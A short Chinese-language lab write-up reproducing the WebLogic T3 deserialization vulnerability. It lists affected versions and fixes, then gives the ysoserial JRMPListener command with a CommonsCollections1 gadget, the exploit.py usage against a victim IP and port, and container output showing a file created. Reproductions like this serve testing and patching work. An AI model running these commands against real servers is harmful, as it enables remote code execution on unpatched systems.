漏洞介绍
此漏洞产生于Weblogic T3服务,当开放Weblogic控制台端口(默认为7001端口)时,T3服务会默认开启,因此会造成较大影响。
影响版本:10.3.6.0 ,12.1.3.0 , 12.2.1.2, 12.2.1.3
修复方案:
1.控制T3协议的访问权限临时阻断漏洞利用
2.打上Oracle官方发布的4月份补丁
复现环境
靶机:weblogic192.168.162.130:7001
攻击机:192.168.31.22
漏洞利用
使用ysoserial启动一个JRMP Server(ysoserial下载地址)
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
参数:[listen port]是JRMP Server 监听的端口,[Command]是想要执行命令
使用exp向目标发送数据包。(脚本链接)
exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
参数 |
---|
[victim ip] :目标IP |
[victim port] : 目标端口 |
[path to ysoserial] : ysoserial的路径 |
[JRMPListener ip] : 部署ysoserial的IP |
[JRMPClient] :这里使用的是JRMPClient类 |
xu@ubuntu:~/Desktop/未命名文件夹$ docker exec -ti 0c8c95562531 /bin/bash
root@0c8c95562531:~/Oracle/Middleware# ls
ceshi.txt成功创建